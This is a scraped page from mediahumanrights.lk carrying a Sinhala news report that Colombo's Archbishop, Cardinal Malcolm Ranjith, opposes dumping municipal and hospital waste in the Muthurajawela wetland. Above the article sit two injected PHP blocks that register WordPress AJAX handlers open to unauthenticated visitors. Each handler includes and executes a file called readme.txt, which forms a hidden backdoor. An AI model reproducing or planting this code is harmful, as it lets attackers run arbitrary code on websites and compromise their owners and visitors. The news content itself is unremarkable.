if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මුතුරාජවෙලට කසළ බැහැර කිරීමට අගරදගුරුගේ විරෝධය - mediahumanrights.lk
mediahumanrights.lk
Local News News

මුතුරාජවෙලට කසළ බැහැර කිරීමට අගරදගුරුගේ විරෝධය

මුතුරාජවෙල වගුරු බිමට කසළ බැහැර කිරීමට විරෝධය පළ කරන බව කොළඹ අගරදගුරු අතිඋතුම් මැල්කම් කාදිනල් රංජිත් හිමිපාණන් පවසයි.
ආරෝග්‍යශාලාවලින් සහ මෟත ශරීරාගාර වලින් බැහැර කරන ශරීර කොටස් පවා ජලය පිරී ඇති ස්ථානවලට දැමීම කිසිඳු ප්‍රමිතියකින් තොරව මෙහි සිදුවෙමින් පවතින බවද උන්වහන්සේ පෙන්වා දෙයි.
උන්වහන්සේ බලධාරීන්ගෙන් ඉල්ලා සිටින්නේ පරිසරයට හා ජනතාවට හානි නොවන අයුරින් කසළ ගැටළුව විසඳීමට කටයුතු කරන ලෙසයි.
කෙසේ වෙතත් බෝපිටිය, දෑලතුර, මුතුරාජවෙල වගුරුබිමේ පිහිටි පෞද්ගලික ඉඩමට කොළඹ මහනගර සභාවේ කැළිකසළ බැහැර කිරීම ඊයේ තුන්වන දිනටත් සිදුවුණි.
(under the courtesy of adaderana news web)

Related posts

රවී ගෙන් ශ්‍රීලනිප ඇමතිවරුන්ට ප්‍රහාරයක් (වීඩියෝ)

Shiran Viraj

සචිත‍්‍ර සේනානායක අත්අඩංගුවට ගනී..

Shiran Viraj

‘යුක්තිය’ මගින් නීති නොකඩනු.. මානව හිමිකම් රකිනු..- පොලිස් කොමිසම දේශබන්දුට දන්වයි..

Shiran Viraj